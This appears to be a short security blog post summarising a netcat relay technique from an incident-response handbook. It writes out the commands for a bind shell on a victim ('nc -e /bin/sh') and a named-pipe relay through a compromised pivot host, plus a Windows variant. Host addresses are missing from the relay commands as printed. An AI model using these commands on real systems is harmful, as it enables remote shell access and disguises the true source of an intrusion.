Netcat Relay on Linux

I purchased the book "Blue Team Handbook: Incident Response Edition" and it arrived today.  I skimmed the whole book and now I am going back through to look closer at a few items that caught my eye. One of them was the setting up of a netcat relay on linux.

The netcat relay works if you have 3 hosts:
Host 1 - - Attacker
Host 2 - - Compromised Victim (Pivot point or relay point)
Host 3 - - Compromised Victim

On Host 1 you execute: "nc -l -p 4545".  This opens a listening port on your attacking computer.

On Host 3 you execute: "nc -l -p 2525 -e /bin/sh".  This opens a listening port and upon connect executes an interactive shell.

Then on Host 2 you execute the following commands:
"mknod backpipe p"
"nc 4545 0<backpipe | nc 2525 1>backpipe"

If a windows host was in the middle you would execute the following:
"echo nc 2525 > relay.bat"  # You need permission to write a file called relay.bat
"nc 4545 -e relay.bat"

The commands that are executed on Host 1 are then relayed through Host 2 to Host 3 giving the appearance that Host 2 is the one attacking Host 3.

Here is a link to SANS netcat cheat sheet demonstrating how it can be done on Windows also.

Here is a link to a video that goes through the above scenario using 3 linux hosts.  In the book it is a little different due to only using an Attacker and a Victim for their example, which works also!

Below if you click on the picture of the book it will take you to how you can order it on Amazon:


Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

Python - Vega Conflict Script to Maximize Fleet Sizes based on Fleet Mass

VBA - Script to Download a file from a URL

IoT Malware Analysis - CnC Server - Part 3